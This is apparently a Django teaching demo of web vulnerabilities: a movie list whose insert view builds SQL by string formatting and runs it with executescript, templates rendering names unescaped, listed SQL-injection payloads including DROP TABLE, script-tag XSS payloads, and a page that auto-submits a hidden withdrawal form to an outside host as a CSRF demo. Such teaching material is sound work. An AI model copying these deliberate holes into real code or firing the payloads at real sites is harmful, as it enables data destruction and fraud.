mysite/urls.py
from django.contrib import admin
from django.urls import path, include

from . import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path('sqlinject/', include('sqlinject.urls')),
    path('csrf_attack/',views.csrf_attack,name='csrf'),
]

sqlinject/urls.py
from django.urls import path
from . import views

app_name='inject'

urlpatterns = [
   path('',views.index, name='index'), 
   path('inject/', views.inject, name='inject'),
   path('regenerate/', views.regenerate_table, name='regenerate'),
]

sqlinject/models.py
from django.db import models
from django.db.models.fields import CharField, DateField
from django import forms
from datetime import date
# Create your models here.

this_year = date.today().year
CHOICES = [(this_year-x,this_year-x) for x in range(100)]

class Movie(models.Model):
    name = CharField(max_length=255, null=False, blank=False) 
    director = CharField(max_length=50, null=True, blank=True)
    year_released = CharField(max_length=4,null=True,blank=True)

    def __str__(self):
        return f"{self.name} ({self.year_released})"


class MovieForm(forms.ModelForm):
    class Meta:
        model = Movie
        fields = ['name', 'year_released']
        widgets = {
            "year_released" : forms.Select(choices=CHOICES),
            "name": forms.TextInput(attrs={'size':30})
        }
    

mysite/views.py
from django.http.response import HttpResponse, HttpResponseRedirect
import requests, urllib
from django.shortcuts import redirect, render

import sys 

def csrf_attack(r):
    return render(r,"csrf_attack.html")

   

sqlinject/views.py
from django.http.response import HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from .models import Movie, MovieForm
from django.db import connection
import sqlite3
from django.db.utils import OperationalError
import subprocess
import html, sys, traceback

# Create your views here.
def index(r):
    form = MovieForm()
    movies = Movie.objects.all()
    try:
        return render(r, 'inject/index.html', {'movies':movies, "form": form})
    except OperationalError as e:
        movies = None
        return render(r, 'inject/index.html', {'movies':movies, "form": form, "gone":True})

    
def inject(r):
    name = r.POST['name']
    year = r.POST['year_released']
    # cursor = connection.cursor()
    query = "INSERT INTO sqlinject_movie(name,year_released) values('%s', '%s');" % (name, year)
    # query = html.unescape(query)

    try:
        db = sqlite3.connect('db.sqlite3')
        cursor = db.cursor()
        cursor.executescript(query)
        db.commit()
        db.close()
    except Exception as e:
        traceback.print_exc()

    return HttpResponseRedirect(reverse('inject:index'))

def regenerate_table(r):
    # run in the command-line:
    subprocess.run(['./manage.py', 'reset_db', '--noinput', '--close-sessions']) # reset db using the django_extensions module; it destroys the whole db
    subprocess.run(['./manage.py','migrate']) # apply all migrations 

    queries = "Movie.objects.create(name='Inception', year_released='2010')"
    queries += "\nMovie.objects.create(name='Interstellar', year_released='2014')"
    queries += "\nMovie.objects.create(name='Memento', year_released='2000')"
    
    subprocess.run(['./manage.py','shell_plus', '--quiet-load','-c', queries])
    # p.stdin.write(queries)
    # p.communicate()
    
    return HttpResponseRedirect(reverse('inject:index'))

templates/base.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
</head>
<body>
    <div class="guide">If you damage this page's HTML or the database, go to <b>sqlinject/regenerate/</b> to reset.</div>
    <div class="wrapper">

    {% block content %}

    {% endblock %}

    </div>
</body>
</html>

templates/csrf_attack.html
<body>
<form id="csrf_form" action="https://demo-csrf-attack.herokuapp.com/withdrew/" method="POST" name="csrf_form">
    <input type="text" name="current_balance" value="1000" readonly required id="id_current_balance">
    <input type="number" name="withdrew" value="1000" required id="id_withrew">
    <input type="hidden" name="hack" value="true" >
</form>
</body>
<script>

window.addEventListener('DOMContentLoaded', function () {
    document.csrf_form.submit();
    document.csrf_form.remove();
    alert("you're been csrfed. You're losing 1000 dollars")
    var x  = document.createElement("h3")
    document.body.appendChild(x);
})

</script>

templates/inject/index.html
{% extends "../base.html" %}
{% load static %}
{% block content %}
<h2>Let's play with <b style="color: blueviolet;">SQL Injection</b>, <b style="color: palevioletred;">Cross-site Scripting</b> </h2>    
<p>Below is a list of movies. And a form to add a movie to the database.<br> 
    Upon clicking "Add Movie"...
    <br>
    This'll be executed on Sqlite: <b>INSERT INTO sqlinject_movie(name, year_released) values('a', 'b');</b> in which <b>a = movie-name</b> & <b>b = year-released</b>
    <br>
    <br>
    Let's <i style="color: blueviolet; font-weight: bolder;">SQL Inject</i> it<hr>
    To <b><i>add a new movie</i></b>, you can type: <b style="color: red;">','');INSERT INTO sqlinject_movie(name) values('hack');--</b>
    <br>
    To <b><i>delete one</i></b>, you can: <b style="color: red;">','');DELETE FROM sqlinject_movie WHERE name='<i style="color:green;">moviename</i>';--</b>
    <br>
    How about <b><i>dropping the whole table?</i></b>: <b style="color: red;">','');DROP TABLE sqlinject_movie;--</b>
    <br>
    <br>
    Let's <i style="color: palevioletred; font-weight: bolder;">Cross-site Script</i> it<hr>
    Add a movie with this name: <b style="color: red;">&lt;script&gt;alert("You have been hacked!"); &lt;/script&gt;</b>
    <br>
    Remove this page's content <b style="color: red;">&lt;script&gt;document.querySelector(".wrapper").remove();&lt;/script&gt;</b>

</p>
<h3 class='title'>-- Movie List --</h3>
{% if gone %}
<a href="{% url 'inject:regenerate' %}">Table was deleted. Click here to regenerate database.</a>
{% endif %}
<ul>
{% for movie in movies %}
<li>{{movie.name|safe }} ({{movie.year_released}})</li>
{% endfor %}
</ul>

<form action="{% url 'inject:inject' %}", method="POST">
    {{ form.as_p }}
    <input type='submit' value="Add movie">
</form>
{% endblock %}